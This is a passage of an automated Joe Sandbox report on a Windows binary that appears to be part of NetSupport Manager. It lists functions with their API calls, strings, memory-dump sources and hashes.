                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __alloca_probe_16__itow_wcschr
                                                                                                                        • String ID: !#$%&'()*+,/:;=?@[]
                                                                                                                        • API String ID: 2093176627-4199889719
                                                                                                                        • Opcode ID: bbb49027525458d7babfa5701d713e014037d0babd4573b5b93361749dbf3956
                                                                                                                        • Instruction ID: fd83e290d45033ac3f2a0b41e03dc3ea92810b8b604a2d57189005a5a4552de4
                                                                                                                        • Opcode Fuzzy Hash: bbb49027525458d7babfa5701d713e014037d0babd4573b5b93361749dbf3956
                                                                                                                        • Instruction Fuzzy Hash: 9E31CC75A002189BCB24DB98CC56AAEB7F8FF84700F4146AAE8059B390EB71AD04C791
                                                                                                                        Function 00B32040 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B32099
                                                                                                                        • DeleteAce.ADVAPI32(00000104,00000000), ref: 00B32106
                                                                                                                        • LocalFree.KERNEL32(?), ref: 00B32124
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDeleteFreeLocalProc
                                                                                                                        • String ID: GetNamedSecurityInfoW
                                                                                                                        • API String ID: 3891521895-3879530689
                                                                                                                        • Opcode ID: 21b5142ff977b6923e65645a0464d2256d4605f33491cfa0dab33500e44137e9
                                                                                                                        • Instruction ID: 1e500e0c7b1b47b2aed68474a702e7f6bce116d1aff3e6fa6ac2a2b9e2e55470
                                                                                                                        • Opcode Fuzzy Hash: 21b5142ff977b6923e65645a0464d2256d4605f33491cfa0dab33500e44137e9
                                                                                                                        • Instruction Fuzzy Hash: 4F31B671B00704ABCB24DF99CD86F9AB7ECEF54751F208499F645EB281DAB4A904CB50
                                                                                                                        Function 00B02980 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                        • API String ID: 4104443479-323366856
                                                                                                                        • Opcode ID: b783275b3945e651cc4b0bd5b2792da99101da97ab6a3934184d3a4829719b61
                                                                                                                        • Instruction ID: 028bd24d16df93f1a77fb44b85f011c800e1c8cd45f9dad9a7696639f28eb6da
                                                                                                                        • Opcode Fuzzy Hash: b783275b3945e651cc4b0bd5b2792da99101da97ab6a3934184d3a4829719b61
                                                                                                                        • Instruction Fuzzy Hash: 612136327102066BDB20AB48CCA6EA7B7D9EF94794B0485A5F845DB3D1EB60ED18C7D0
                                                                                                                        Function 00B153C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,RtlCaptureStackBackTrace), ref: 00B153EC
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B153F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: RtlCaptureStackBackTrace$kernel32.dll
                                                                                                                        • API String ID: 1646373207-94782561
                                                                                                                        • Opcode ID: 39b8a051d6d9f4e653e71cff6aa5c70c155b519c197dd2c0bacaf8fdc9a5d344
                                                                                                                        • Instruction ID: df871d44dd3dc979291f5459d0d262ad52922f92f282279ab3c6a2687a04d80d
                                                                                                                        • Opcode Fuzzy Hash: 39b8a051d6d9f4e653e71cff6aa5c70c155b519c197dd2c0bacaf8fdc9a5d344
                                                                                                                        • Instruction Fuzzy Hash: 71217675A006199BCB20DF68DD81AEAB3F5EF88301F4041A9E90993395DA749EC4CF94
                                                                                                                        Function 00AFED00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyW.ADVAPI32(?,?,?), ref: 00AFED91
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,-00000002), ref: 00AFEDA6
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFEDC5
                                                                                                                        Strings
                                                                                                                        • RegDeleteKey(%s, %s) ret %d, xrefs: 00AFEDB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateDelete
                                                                                                                        • String ID: RegDeleteKey(%s, %s) ret %d
                                                                                                                        • API String ID: 716773620-1181619153
                                                                                                                        • Opcode ID: 239c29c05c75439bb08c8a6a5e47b7335af0d6fedbe6c3208447faee08c9fc15
                                                                                                                        • Instruction ID: 0b80332e9226d8cb9b79a56eaa5c6af6c9d0864371d938ddbf70e7815105694c
                                                                                                                        • Opcode Fuzzy Hash: 239c29c05c75439bb08c8a6a5e47b7335af0d6fedbe6c3208447faee08c9fc15
                                                                                                                        • Instruction Fuzzy Hash: F7219571A0031D9BCB20DFA8CC49AAB73B9EF54300F0045D9F90997251EA709E44CFA0
                                                                                                                        Function 00AFED29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyW.ADVAPI32(?,?,?), ref: 00AFED91
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,-00000002), ref: 00AFEDA6
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFEDC5
                                                                                                                        Strings
                                                                                                                        • RegDeleteKey(%s, %s) ret %d, xrefs: 00AFEDB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateDelete
                                                                                                                        • String ID: RegDeleteKey(%s, %s) ret %d
                                                                                                                        • API String ID: 716773620-1181619153
                                                                                                                        • Opcode ID: 3d7fc59bf61cfc1c5791f4f3b0a6754f82130ff3ee4a1e22c88435badf4bbe19
                                                                                                                        • Instruction ID: 2b935f29b397342f5c7c41aa1d8ef52a05a32f784e8d32319043c228250f6fbc
                                                                                                                        • Opcode Fuzzy Hash: 3d7fc59bf61cfc1c5791f4f3b0a6754f82130ff3ee4a1e22c88435badf4bbe19
                                                                                                                        • Instruction Fuzzy Hash: E8118271A013299BCB30EBA5DC49FBBB3B9EF54310F1045D9FA0993252EA749D40CBA1
                                                                                                                        Function 00B24BF4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B24C71
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CopyFile
                                                                                                                        • String ID: localmon$pcimon$pcimon.dll
                                                                                                                        • API String ID: 1304948518-3058681259
                                                                                                                        • Opcode ID: 82c9571082e7c9299a977f205fb65527114937d18df1fadf84dac125dedc287e
                                                                                                                        • Instruction ID: b212240126f4c1a5f032dbe53bc2a5ecacdabb9c6fde78b3c169cebb821a4501
                                                                                                                        • Opcode Fuzzy Hash: 82c9571082e7c9299a977f205fb65527114937d18df1fadf84dac125dedc287e
                                                                                                                        • Instruction Fuzzy Hash: 0A11C471A012249BDB20EB58EC52BAD73F1FB50700F5081E8E50E67581DF32AE81CF91
                                                                                                                        Function 00B00080 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedIncrement.KERNEL32(00B8B6D0), ref: 00B000BA
                                                                                                                        • wsprintfW.USER32 ref: 00B000E6
                                                                                                                        • CreateEventW.KERNEL32(?,?,?,?), ref: 00B00106
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEventIncrementInterlockedwsprintf
                                                                                                                        • String ID: %s_L%d_%x
                                                                                                                        • API String ID: 608154824-3441399356
                                                                                                                        • Opcode ID: 709bf6077e0e79167114445e8ad4cb2359d126e1d46b1082cb8349e046022395
                                                                                                                        • Instruction ID: 4e4f7aab5362265d345d1e0b6f54b0eba3e4a1913aa47b11643e9a4575e76643
                                                                                                                        • Opcode Fuzzy Hash: 709bf6077e0e79167114445e8ad4cb2359d126e1d46b1082cb8349e046022395
                                                                                                                        • Instruction Fuzzy Hash: A9115171A0021DABCB10DF64DC59EEBB7BCEB88300F004099F90993251EA70AE04CBA1
                                                                                                                        Function 00B2AF26 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53registryprocesssynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,UninstallString,00000000,?,?,?), ref: 00B2AF5D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B2AF68
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        • _memset.LIBCMT ref: 00B2AFAD
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B2AFE2
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B2B01C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2B02F
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2B038
                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00B2B04D
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 00B2B07D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$Handle$CreateDeleteLoadObjectOpenProcessQuerySingleStringValueWait_memsetwvsprintf
                                                                                                                        • String ID: UninstallString
                                                                                                                        • API String ID: 1420948804-1433857529
                                                                                                                        • Opcode ID: 3fad0f67ce5e658f6c39a925b1613d0e87266dc74df8d1394860ba016b764005
                                                                                                                        • Instruction ID: 87a4c9e1bf4d424a98d1e3772c8d46b55ee6d5de28bbd96bc1bba65be788b3ed
                                                                                                                        • Opcode Fuzzy Hash: 3fad0f67ce5e658f6c39a925b1613d0e87266dc74df8d1394860ba016b764005
                                                                                                                        • Instruction Fuzzy Hash: 5C01A1B190022A9BDB21DB58DC49FEBB3E8EB54304F0041C9B91DA7192DA706E858B51
                                                                                                                        Function 00B16990 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 00B169D0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetGestureConfig), ref: 00B169E0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: SetGestureConfig$user32.dll
                                                                                                                        • API String ID: 2574300362-2478114855
                                                                                                                        • Opcode ID: fce295f23e9df72a3a37044df5f40fc0023807d2d581e85d624ec1c92a7ef5b0
                                                                                                                        • Instruction ID: 5ed375bda4eb8c48a1c407a2544d83112fc050783c256b902cb0d17262b237d8
                                                                                                                        • Opcode Fuzzy Hash: fce295f23e9df72a3a37044df5f40fc0023807d2d581e85d624ec1c92a7ef5b0
                                                                                                                        • Instruction Fuzzy Hash: 8C115B70E10209ABDB10EFA4C845BEE7BF8EF04714F404199E819B72C1DFB59A448B95
                                                                                                                        Function 00B02170 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcspbrk
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$nsChars.IsA()
                                                                                                                        • API String ID: 402402107-2794583141
                                                                                                                        • Opcode ID: 47a5c65b391ec3f6860f045247f005fd9693531b1f0dce46d783660f93ebf675
                                                                                                                        • Instruction ID: 17cd7db0ea0ecb77aa9a7834e9f59f27820be25010595784458d5f803a300334
                                                                                                                        • Opcode Fuzzy Hash: 47a5c65b391ec3f6860f045247f005fd9693531b1f0dce46d783660f93ebf675
                                                                                                                        • Instruction Fuzzy Hash: D601447A7102052FD910EB18EC92D2AB3DDEF99350B1480A4FE48A73C1CB72ED0886A1
                                                                                                                        Function 00B1ED20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B18BC0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B18C1C
                                                                                                                          • Part of subcall function 00B18BC0: SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 00B18C5F
                                                                                                                          • Part of subcall function 00B18BC0: SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 00B18CB7
                                                                                                                        • wsprintfW.USER32 ref: 00B1ED4E
                                                                                                                        • wsprintfW.USER32 ref: 00B1ED64
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderPathwsprintf$FileModuleName
                                                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC
                                                                                                                        • API String ID: 341647881-3388120946
                                                                                                                        • Opcode ID: 0d71b86e3d56a81bbf90c826eec54b243de6c5ff88e3b4cd85eff6a27a878894
                                                                                                                        • Instruction ID: ddc31927492d7202020b338bd0432e5e40d6aae38f1be947a9ecf4682e0b33b1
                                                                                                                        • Opcode Fuzzy Hash: 0d71b86e3d56a81bbf90c826eec54b243de6c5ff88e3b4cd85eff6a27a878894
                                                                                                                        • Instruction Fuzzy Hash: 0F01B1B1D0520C66CB10ABA09C42FEB77ECAB44300F4005E9BD199B182ED70AA448AE1
                                                                                                                        Function 00B268C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RemoveDirectoryW.KERNEL32(00B8C848,00000000,?,00B2CF57), ref: 00B26961
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryRemove
                                                                                                                        • String ID: cic\delta.zip$cic\setup.exe$cic\setup.msi
                                                                                                                        • API String ID: 597925465-3980332394
                                                                                                                        • Opcode ID: a50f2c1a55e7bf15af2e398f0c83ac692e1c729bba4bf339732e4afcc28cb32f
                                                                                                                        • Instruction ID: fd4c16986f80be93177d030ea5652b6bf34631b7318871f5194887b8597015fd
                                                                                                                        • Opcode Fuzzy Hash: a50f2c1a55e7bf15af2e398f0c83ac692e1c729bba4bf339732e4afcc28cb32f
                                                                                                                        • Instruction Fuzzy Hash: DA118B76E002118EC725AB2CE92B66773F1FF85380F054496E80A8B634FB305915D7A6
                                                                                                                        Function 00B04330 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 00B0437E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 00B0439A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: _TrackMouseEvent$comctl32.dll
                                                                                                                        • API String ID: 2574300362-2314894490
                                                                                                                        • Opcode ID: d630cae45d1bf0b8702bb57ca48facaf108cf473c17fc65e5a24ccab25d886ec
                                                                                                                        • Instruction ID: 5e26a4427cca70a45eb7ae13907c4e5567e04e8d8c710b02120104f05ccc8e24
                                                                                                                        • Opcode Fuzzy Hash: d630cae45d1bf0b8702bb57ca48facaf108cf473c17fc65e5a24ccab25d886ec
                                                                                                                        • Instruction Fuzzy Hash: E7119BB090430A9FDB04DFA9D844B9ABBF4FB18304F1045AEE929D73A0FB759644CB94
                                                                                                                        Function 00AF6016 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • \StringFileInfo\%04x%04x\FileDescription, xrefs: 00AF6041
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
